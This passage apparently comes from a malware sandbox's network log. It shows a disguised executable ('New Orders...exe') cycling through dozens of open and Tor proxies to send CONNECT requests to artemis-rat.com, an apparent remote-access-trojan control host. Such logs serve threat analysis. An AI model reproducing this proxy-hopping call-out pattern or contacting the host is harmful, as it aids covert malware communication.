                                                                                        Mar 11, 2024 16:16:43.960792065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.172390938 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        291192.168.2.95070093.171.220.22988887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.868860006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.275077105 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        292192.168.2.950714188.132.222.780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.872330904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.616930962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.711280107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961679935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.370528936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773351908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:58.163999081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:06.976260900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:24.663741112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        293192.168.2.950859104.16.241.204807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.886744976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.041421890 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        294192.168.2.95083023.95.209.142156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.887448072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        295192.168.2.950723221.6.139.19090027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.893855095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.309587955 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        296192.168.2.950775135.181.102.11871177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.894033909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.261861086 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        297192.168.2.95078972.195.114.16941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.894879103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        298192.168.2.950793134.209.29.12031287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.904561996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.709897995 CET28INHTTP/1.1 400 Bad Request


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        299192.168.2.949942148.72.209.174124467672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.915666103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        300192.168.2.950037103.231.248.9831287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.931147099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.960815907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.977031946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.976625919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.976512909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:17.070053101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.070044994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:53.072313070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        301192.168.2.95077691.241.217.5890907672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.934567928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        302192.168.2.950805211.222.252.18781937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.467971087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        303192.168.2.95078491.202.230.21980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.468071938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        304192.168.2.95007194.186.234.23680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.468250990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.158284903 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        305192.168.2.95005579.110.196.14580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.468383074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        306192.168.2.950679201.243.82.15731287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.468528032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.538778067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        307192.168.2.95081837.120.192.15480807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.469532967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.335473061 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        308192.168.2.95010151.158.108.134163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.469589949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.476980925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.667992115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773282051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:05.773346901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:17.773121119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:29.773389101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:32.689527035 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                        Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        309192.168.2.950845190.153.121.241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.469696045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        310192.168.2.95006045.11.95.16660147672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.470185995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.491498947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.616808891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.723223925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        311192.168.2.95086367.43.236.20266937672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.470343113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        312192.168.2.95087167.43.227.227287237672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.526957989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
